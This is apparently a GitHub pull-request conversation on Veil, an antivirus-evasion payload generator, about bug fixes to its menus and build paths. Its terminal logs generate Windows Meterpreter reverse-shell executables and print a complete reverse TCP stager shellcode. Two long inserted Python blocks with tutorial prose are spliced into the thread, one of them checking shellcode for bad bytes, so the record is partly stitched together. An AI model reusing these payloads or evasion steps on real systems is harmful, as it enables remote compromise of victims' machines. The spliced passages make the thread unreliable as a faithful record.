This repository has been archived by the owner on Jan 10, 2024. It is now read-only.

Applying Kali's Patches & Other stuff #189

Merged (38 commits), Apr 23, 2018

Conversation

g0tmi1k (Contributor) commented Apr 10, 2018

No description provided.

g0tmi1k changed the title from "Misc" to "Applying Kali's Patches & Other stuff" on Apr 10, 2018
ChrisTruncer (Member) commented:
Hey, I went through and tested this. Ran into one issue, and one oddity I wanted to run by you. With this current pull request, I can't generate golang based payloads. When trying to compile, it provides the following error:

[screenshot: missing go]

Also, this isn't a bug because it still works, but when giving the "generate" command, Veil normally used to go back to its normal menu (it has the Veil header at the top) and ask how to get the shellcode. However, now it seems to just go to the next line down (in the pic below).

[screenshot: no titlebar]

I'm not sure if this is due to the patch, or somehow the code doing something odd. I'll try to check into it too.

g0tmi1k (Contributor Author) commented Apr 11, 2018

Sorry, the commits before were WIP.
It is now finished/ready to be merged.


The reason why it continues is because it was running os.system, which failed without fully checking the output (REF: https://github.com/Veil-Framework/Veil/blob/master/tools/evasion/evasion_common/outfile.py#L206).
Fixed the os.system, but didn't fix the check for the output file.


g0tmi1k@kali-dev:~/Desktop/Veil$ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 127.0.0.1 --port 4444
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

runtime/internal/sys
runtime/internal/atomic
runtime
errors
internal/race
sync/atomic
math
sync
io
unicode/utf8
internal/syscall/windows/sysdll
unicode/utf16
syscall
strconv
reflect
encoding/binary
command-line-arguments
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Language: go
 [*] Payload Module: go/meterpreter/rev_tcp
 [*] Executable written to: /var/lib/veil/output/compiled/payload.exe
 [*] Source code written to: /var/lib/veil/output/source/payload.go
 [*] Metasploit RC file written to: /var/lib/veil/output/handlers/payload.rc
g0tmi1k@kali-dev:~/Desktop/Veil$ 
g0tmi1k@kali-dev:~/Desktop/Veil$ file /var/lib/veil/output/compiled/payload.exe
/var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
g0tmi1k@kali-dev:~/Desktop/Veil$
g0tmi1k@kali-dev:~/Desktop/Veil$ ls -lah /var/lib/veil/output/compiled/payload.exe
-rwxr-xr-x 1 g0tmi1k g0tmi1k 770K Apr 11 17:40 /var/lib/veil/output/compiled/payload.exe
g0tmi1k@kali-dev:~/Desktop/Veil$
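
The failure mode described in the comment above (os.system returning without anyone checking whether the compiler actually produced a file) is worth seeing in code. The following is an added example, not code from Veil or from either participant: a compile wrapper that runs the compiler without a shell, distinguishes "compiler not installed" from "compiler failed" from "compiler exited 0 but wrote nothing", and only reports success once the artifact exists and is non-empty. The demo cases use the Python interpreter itself as a stand-in compiler and a temporary directory, so they are constructed and do not touch /var/lib/veil.

```python
import shlex
import subprocess
import sys
import tempfile
from pathlib import Path


class CompileError(RuntimeError):
    """The compiler was missing, exited non-zero, or exited 0 without writing its output."""


def compile_and_check(command, output_path, timeout=300):
    """Run a compiler command and confirm it actually produced output_path.

    os.system() returns a wait status that is easy to ignore, and it hands the
    command line to /bin/sh. subprocess.run() with an argument list avoids the
    shell, exposes the exit code and stderr, and lets us verify the artifact
    itself before reporting success.
    """
    argv = shlex.split(command) if isinstance(command, str) else list(command)
    output = Path(output_path)
    # A stale file from a previous run must not pass as this run's output.
    if output.exists():
        output.unlink()
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    except FileNotFoundError:
        # The binary is not on PATH: the "missing go" case from the comment above.
        raise CompileError(f"missing {argv[0]}") from None
    except subprocess.TimeoutExpired:
        raise CompileError(f"{argv[0]} timed out after {timeout}s") from None
    if proc.returncode != 0:
        raise CompileError(f"{argv[0]} exited {proc.returncode}: {proc.stderr.strip()}")
    if not output.is_file() or output.stat().st_size == 0:
        raise CompileError(f"{argv[0]} exited 0 but did not write {output}")
    return output


def _failure(argv, out):
    """Return the CompileError message, or None if the call unexpectedly succeeded."""
    try:
        compile_and_check(argv, out)
    except CompileError as exc:
        return str(exc)
    return None


def run_demo():
    """Exercise the four outcomes; python stands in for the compiler (constructed cases)."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        out = Path(tmp) / "payload.exe"
        # 1. Compiler writes the artifact and exits 0: the only path that returns a value.
        written = compile_and_check(
            [sys.executable, "-c", f"open({str(out)!r}, 'wb').write(b'MZ')"], out
        )
        results["ok"] = written.stat().st_size
        # 2. Compiler binary is absent (hypothetical name, guaranteed not on PATH).
        results["missing"] = _failure([".nonexistent-compiler-xyz"], out)
        # 3. Compiler exits non-zero.
        results["nonzero"] = _failure([sys.executable, "-c", "import sys; sys.exit(2)"], out)
        # 4. Compiler exits 0 but produces no file: the case a bare os.system() hides.
        results["silent"] = _failure([sys.executable, "-c", "pass"], out)
    return results


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The fourth case is the one that matters for the behaviour ChrisTruncer saw: a toolchain that exits 0 while writing nothing looks identical to success unless the caller stats the output file afterwards.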

ChrisTruncer (Member) commented:
There looks to be a bug when using msfvenom for generating shellcode rather than veil-ordnance. If you use msfvenom, you get asked for the payload type, IP, and port. It then asks if you have any extra options. If there are none, and you hit enter, msfvenom should generate the shellcode.

However, if you hit enter, msfvenom isn't invoked, and you're dropped right into the Veil-Ordnance menu.

[screenshot: msfvenom2ordnance]

This was referenced Apr 12, 2018
g0tmi1k (Contributor Author) commented Apr 12, 2018

Thanks @leesoh!

g0tmi1k (Contributor Author) commented Apr 12, 2018

@ChrisTruncer I can't find your bug. I don't know where you are looking/how you are triggering it.

Evasion

g0tmi1k@kali-dev:~/Desktop/Veil$ ./Veil.py 
===============================================================================
                             Veil | [Version]: 3.1.5
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

	2 tools loaded

Available Tools:

	1)	Evasion
	2)	Ordnance

Available Commands:

	exit			Completely exit Veil
	info			Information on a specific tool
	list			List available tools
	options			Show Veil configuration
	update			Update Veil
	use			Use a specific tool


Main menu choice: use 1
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Veil-Evasion Menu

	41 payloads loaded

Available Commands:

	back			Go to Veil's main menu
	checkvt			Check VirusTotal against generated hashes
	clean			Remove generated artifacts
	exit			Completely exit Veil
	info			Information on a specific payload
	list			List available payloads
	use			Use a specific payload

Veil-Evasion command: use 5
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 Payload information:

	Name:		Pure C Reverse HTTP Stager
	Language:	c
	Rating:		Excellent
	Description:    pure windows/meterpreter/reverse_http stager, no
	                shellcode

Payload: c/meterpreter/rev_http selected

Required Options:

Name            	Value   	Description
----            	-----   	-----------
COMPILE_TO_EXE  	Y       	Compile to an executable
LHOST           	        	IP of the Metasploit handler
LPORT           	8080    	Port of the Metasploit handler

 Available Commands:

	back        	Go back
	exit        	Completely exit Veil
	generate    	Generate the payload
	options     	Show the shellcode's options
	set         	Set shellcode option
[c/meterpreter/rev_http>>] set LHOST 127.0.0.1
[c/meterpreter/rev_http>>] options

Payload: c/meterpreter/rev_http selected

Required Options:

Name            	Value   	Description
----            	-----   	-----------
COMPILE_TO_EXE  	Y       	Compile to an executable
LHOST           	127.0.0.1	IP of the Metasploit handler
LPORT           	8080    	Port of the Metasploit handler

 Available Commands:

	back        	Go back
	exit        	Completely exit Veil
	generate    	Generate the payload
	options     	Show the shellcode's options
	set         	Set shellcode option
[c/meterpreter/rev_http>>] run
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Please enter the base name for output files (default is payload): test100
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Language: c
 [*] Payload Module: c/meterpreter/rev_http
 [*] Executable written to: /var/lib/veil/output/compiled/test100.exe
 [*] Source code written to: /var/lib/veil/output/source/test100.c
 [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/test100.rc

Hit enter to continue... 
[c/meterpreter/rev_http>>] exit
g0tmi1k@kali-dev:~/Desktop/Veil$ 

Ordnance

g0tmi1k@kali-dev:~/Desktop/Veil$ ./Veil.py 
===============================================================================
                             Veil | [Version]: 3.1.5
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

	2 tools loaded

Available Tools:

	1)	Evasion
	2)	Ordnance

Available Commands:

	exit			Completely exit Veil
	info			Information on a specific tool
	list			List available tools
	options			Show Veil configuration
	update			Update Veil
	use			Use a specific tool


Main menu choice: use 2
===============================================================================
                                   Veil-Ordnance
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Veil-Ordnance Menu

	6 payloads loaded
	1 encoders loaded

Available Commands:

	back			Go to Veil's main menu
	exit			Completely exit Veil
	info			Information on a specific payload or encoder
	list			List available [payloads] or [encoders]
	use			Use a specific payload

Veil-Ordnance command: use rev_tcp
===============================================================================
                                   Veil-Ordnance
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Payload: rev_tcp selected

Required Options:

Name            	Value   	Description
----            	-----   	-----------
BadChars        	\x00    	Optional: Bad characters to avoid
Encoder         	None    	Optional: Encoder to use when avoiding bad characters
LHOST           	        	LHOST value
LPORT           	        	LPORT value

Available Commands: 

	back    		Go back 
	exit    		Completely exit Veil
	generate		Generate the payload
	list    		List available encoders
	options 		Show the payload's options
	set     		Set payload option

[rev_tcp>>]: set LPORT 4444
[rev_tcp>>]: set LHOST 127.0.0.1
[rev_tcp>>]: options
===============================================================================
                                   Veil-Ordnance
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Payload: rev_tcp selected

Required Options:

Name            	Value   	Description
----            	-----   	-----------
BadChars        	\x00    	Optional: Bad characters to avoid
Encoder         	None    	Optional: Encoder to use when avoiding bad characters
LHOST           	127.0.0.1	LHOST value
LPORT           	4444    	LPORT value

Available Commands: 

	back    		Go back 
	exit    		Completely exit Veil
	generate		Generate the payload
	list    		List available encoders
	options 		Show the payload's options
	set     		Set payload option

[rev_tcp>>]: run
Payload Name: Reverse TCP Stager (Stage 1)
IP Address: 127.0.0.1
Port: 4444
Shellcode Size: 287

\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x09\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3

Hit enter to continue... 
[rev_tcp>>]: exit
g0tmi1k@kali-dev:~/Desktop/Veil$
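
The Ordnance run above prints the stager as a \xNN string with BadChars set to \x00 and Encoder set to None, and the listing does contain NUL bytes (for example the call offset \xe8\x86\x00\x00\x00 near the start). The following is an added example, not code from Veil or from either participant: it parses an Ordnance-style listing back into bytes, rejects stray characters of the kind that creep in when output is copied through a pastebin, and reports the offsets of any bad characters so the check can be done before the shellcode is handed to an Evasion injector. The sample is constructed from the first twelve bytes of the listing above.

```python
import re

# One escaped byte as Ordnance prints it: \xNN, two hex digits, either case.
_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_escaped(text):
    """Convert a '\\xfc\\xe8...' string to bytes, rejecting anything that is not a \\xNN escape."""
    text = text.strip()
    if not text:
        raise ValueError("empty shellcode string")
    hexpairs = _ESC.findall(text)
    # Every escape is exactly four characters; any leftover means a stray character slipped in.
    if len(hexpairs) * 4 != len(text):
        raise ValueError("shellcode string contains something other than \\xNN escapes")
    return bytes(int(pair, 16) for pair in hexpairs)


def is_valid_listing(text):
    """True if the whole string is a clean run of \\xNN escapes."""
    try:
        parse_escaped(text)
    except ValueError:
        return False
    return True


def find_badchars(shellcode, badchars):
    """Return [(offset, byte), ...] for every occurrence of a forbidden byte."""
    forbidden = set(badchars)
    return [(i, b) for i, b in enumerate(shellcode) if b in forbidden]


def check_shellcode(text, badchars_spec=r"\x00"):
    """Parse an Ordnance-style listing and report its size and any bad-character hits.

    badchars_spec uses the same \\xNN notation as Ordnance's BadChars option.
    """
    shellcode = parse_escaped(text)
    badchars = parse_escaped(badchars_spec)
    hits = find_badchars(shellcode, badchars)
    return {"size": len(shellcode), "bad_offsets": [i for i, _ in hits], "clean": not hits}


# Constructed sample: the first twelve bytes of the rev_tcp listing above. The 32-bit
# call offset \x86\x00\x00\x00 means it carries three NUL bytes at offsets 3, 4 and 5.
SAMPLE = r"\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64"

if __name__ == "__main__":
    print(check_shellcode(SAMPLE))               # default BadChars \x00: three hits
    print(check_shellcode(SAMPLE, r"\x0a\x0d"))  # CR/LF only: clean
```

With Encoder left at None the BadChars value is recorded but nothing rewrites the stager around it, which is exactly what the offsets list makes visible; a practitioner should run a check like this whenever the payload will travel through a NUL-terminated string or a text protocol.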

ChrisTruncer (Member) commented:

No, it did not have the PR merged. I was using it as a separate baseline. I'm a little concerned, though, that that change is impacting Veil (as shown at the end of the pastebin). When I was trying to use Ordnance to generate shellcode, it couldn't take that generated shellcode back into Evasion.

ChrisTruncer (Member) commented:

I'm fine with staying on the same menu and not going immediately back into the top level menu. But I'm not sure if that mod is preventing Evasion from grabbing the shellcode from Ordnance.

g0tmi1k (Contributor Author) commented Apr 13, 2018

Could you give example commands/output, because I'm really not seeing it.

ChrisTruncer (Member) commented:
This is still staying in the Ordnance screen after generating shellcode (after it says "hit enter to return to veil-evasion"). Currently, you have to type back even though it says to hit enter. At this point, I'd prefer for it to jump right back into Evasion if using Ordnance as our shellcode generator.

Sample output here - https://pastebin.com/xq3mY7um

Also, line 158 and 159 show it not displaying the header and just has the commands right after the previous ones.

sys.exit()


sys.path.insert(0, settings.VEIL_EVASION_PATH + 'tools/ordnance')
sys.path.insert(0, settings.VEIL_PATH + 'tools/ordnance')
import tool as ordnance_import
programatologist commented Apr 14, 2018

Shouldn't this be
import tools as ordnance_import
rather than
import tool as ordnance_import
since the module (folder) name is tools? The same issue is present in
tools/evasion/evasion_common/shellcode_help.py

g0tmi1k (Contributor Author) commented Apr 16, 2018

@programatologist ~ But the file it's including is called ./tools/ordnance/tool.py not ./tools/ordnance/tools.py ?


g0tmi1k (Contributor Author) commented Apr 17, 2018

Working!

The issue was we were using different payloads...

root@kali-dev:~/Desktop/veil# ./Veil.py 
...SNIP...
Veil>: use 1
...SNIP...
Veil/Evasion>: use 33
...SNIP...
[python/shellcode_inject/flat>>]: run
...SNIP...
 [>] Please enter the number of your choice: 1
...SNIP...
Veil/Ordnance>: use 2
...SNIP...
[rev_http>>]: set LHOST 127.0.0.1
[rev_http>>]: set LPORT 443
[rev_http>>]: run
...SNIP...
Please enter the base name for output files (default is payload): out
...SNIP...
 [>] Please enter the number of your choice: 1
...SNIP...
 [*] Language: python
 [*] Payload Module: python/shellcode_inject/flat
 [*] Executable written to: /var/lib/veil/output/compiled/out.exe
 [*] Source code written to: /var/lib/veil/output/source/out.py
 [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/out.rc

Hit enter to continue...
...SNIP...
Veil/Evasion>: 

@g0tmi1k g0tmi1k mentioned this pull request Apr 18, 2018
ChrisTruncer (Member) commented:
This is currently failing to start on Debian. I tried on my existing VM, but I did not build a brand new VM. However, I get a "No module named Tool" error.

[screenshot: veil]

ChrisTruncer (Member) commented:
Ok, I figured out the reason @g0tmi1k if you are able to modify your pull request. This should be a quick fix.

Line 741 should say "python3" instead of python when invoking the update-config.py script. After that, it seems to work and run on my system.

The only final issue I am having is that tab completion and all msfvenom shellcode generation is broken on Debian. Trying to look into it now.

ChrisTruncer (Member) commented:

It looks like the "Metasploit_Path" variable is being set within the update-config.py file, except for one-offs based on Linux flavor detection where the path is being changed. Could you change line 178's default value of Metasploit_Path to be "/opt/metasploit-framework/embedded/framework/"?

Veil needs it to be that path to properly parse available payloads under it. Once both changes (from above post too) are made, I think this is good to go. I'll test one more time, but seems to be working with these changes on my end.

g0tmi1k (Contributor Author) commented Apr 23, 2018

Rather than doing something like:

  type python3 2>&1 >/dev/null
  [ $? -eq "0" ] \
    && sudo -u "${trueuser}" sudo python3 update-config.py \
    || sudo -u "${trueuser}" sudo python update-config.py

Something "better" would be to use the shebang to define the python version (as it is already set there!) ~ https://github.com/g0tmi1k/Veil/blob/4791e2a6b6c2b9e7a2759d9305965af0d4efa66e/config/update-config.py#L1.

I dunno what the package path is for Metasploit outside of Kali :P.

Committed!

ChrisTruncer (Member) commented:

Just pushed a minor update to the readme.

All looks great! Thanks for the large amount of time taken to do this, and it's now getting merged!

@ChrisTruncer ChrisTruncer merged commit 1fde7c7 into Veil-Framework:master Apr 23, 2018
ChrisTruncer (Member) commented:
merged!

@g0tmi1k g0tmi1k deleted the misc branch April 23, 2018 15:11
g0tmi1k (Contributor Author) commented Apr 23, 2018

🎉

5 participants